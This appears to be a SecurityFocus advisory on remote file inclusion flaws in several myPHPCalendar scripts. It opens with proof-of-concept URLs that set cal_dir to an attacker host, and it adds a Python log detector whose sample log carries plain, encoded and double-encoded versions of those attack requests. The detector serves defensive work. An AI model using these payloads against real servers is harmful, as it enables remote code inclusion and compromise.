Multiple myPHPCalendar File Include Vulnerabilities

The following proof of concept has been supplied. In each case the cal_dir parameter is used as the location from which the script pulls in its supporting .inc files, so pointing it at a web server under the attacker's control causes those files to be fetched and included from there:

http://www.example.com/admin.php?cal_dir=http://[attacker]/
http://www.example.com/contacts.php?cal_dir=http://[attacker]/
http://www.example.com/convert-date.php?cal_dir=http://[attacker]/

will include the files:

http://[attacker]/vars.inc and/or http://[attacker]/prefs.inc

and http://www.example.com/index.php?cal_dir=http://[attacker]/ will include the files:

http://[target]/globals.inc
http://[target]/sql.inc
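The proof of concept above leaves a recognisable trace in the target's access log: a request to one of the listed scripts whose cal_dir query value is a URL rather than a local directory. The following detector, written as an added example for this page and not taken from the advisory or from myPHPCalendar, flags that shape. It generalises the check beyond http:// to any scheme:// prefix, since a URL-taking include will also accept ftp:// and PHP stream wrappers, and it decodes repeated percent-encoding so a double-encoded payload is still caught. The log lines, addresses and timestamps are constructed for the example.

```python
"""Detect cal_dir remote-file-inclusion attempts in web server access logs.

Added example; not code from the advisory or from myPHPCalendar.  The
sample log, IP addresses and timestamps below are constructed.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" log format; only client IP, timestamp and the
# request path are needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Scripts the advisory names as taking cal_dir.
VULN_SCRIPTS = {"admin.php", "contacts.php", "convert-date.php", "index.php"}
VULN_PARAM = "cal_dir"

# Generalisation: any "scheme://" prefix, not only http://, because a
# URL-taking include also accepts ftp:// and wrappers such as php:// or data://.
REMOTE_SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.I)

# Constructed sample log: one plain attempt, one URL-encoded, one
# double-encoded, one benign local cal_dir, one unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2010:14:02:11 +0000] "GET /admin.php?cal_dir=http://198.51.100.7/ HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Mar/2010:14:02:12 +0000] "GET /index.php?cal_dir=%68%74%74%70%3a%2f%2f198.51.100.7%2f HTTP/1.1" 200 733',
    '203.0.113.9 - - [10/Mar/2010:14:03:01 +0000] "GET /contacts.php?cal_dir=%2568ttp%253A%252F%252F198.51.100.7%252F HTTP/1.1" 200 640',
    '192.0.2.44 - - [10/Mar/2010:14:05:40 +0000] "GET /index.php?cal_dir=./calendar/ HTTP/1.1" 200 2048',
    '192.0.2.44 - - [10/Mar/2010:14:05:41 +0000] "GET /view.php?date=2010-03-10 HTTP/1.1" 200 1800',
]


def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding (%2568 -> %68 -> h) so a double-encoded
    payload is compared in its final decoded form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi(line):
    """Return a dict describing the attempt if the request carries a remote
    cal_dir value, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("path"))  # path-only URL: scheme and netloc are empty
    script = parts.path.rsplit("/", 1)[-1]
    # parse_qsl performs one round of decoding; decode_fully handles any further rounds.
    for key, raw_value in parse_qsl(parts.query, keep_blank_values=True):
        if key != VULN_PARAM:
            continue
        value = decode_fully(raw_value)
        if REMOTE_SCHEME.match(value):
            return {
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "script": script,
                "known_vulnerable_script": script in VULN_SCRIPTS,
                "cal_dir": value,
                "remote_host": urlsplit(value).netloc,
            }
    return None


def scan(lines):
    """Run find_rfi over every log line and keep the hits."""
    return [hit for hit in (find_rfi(line) for line in lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} -> {hit["script"]} cal_dir={hit["cal_dir"]} host={hit["remote_host"]}')
```

The check keys on the cal_dir parameter rather than on the script name, so an attempt against a renamed or unlisted script is still reported; the known_vulnerable_script field records whether the target matched the advisory's list. Only the query string is inspected, because that is what the access log preserves; a value carried in a POST body would not appear there.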

Copyright 2010, SecurityFocus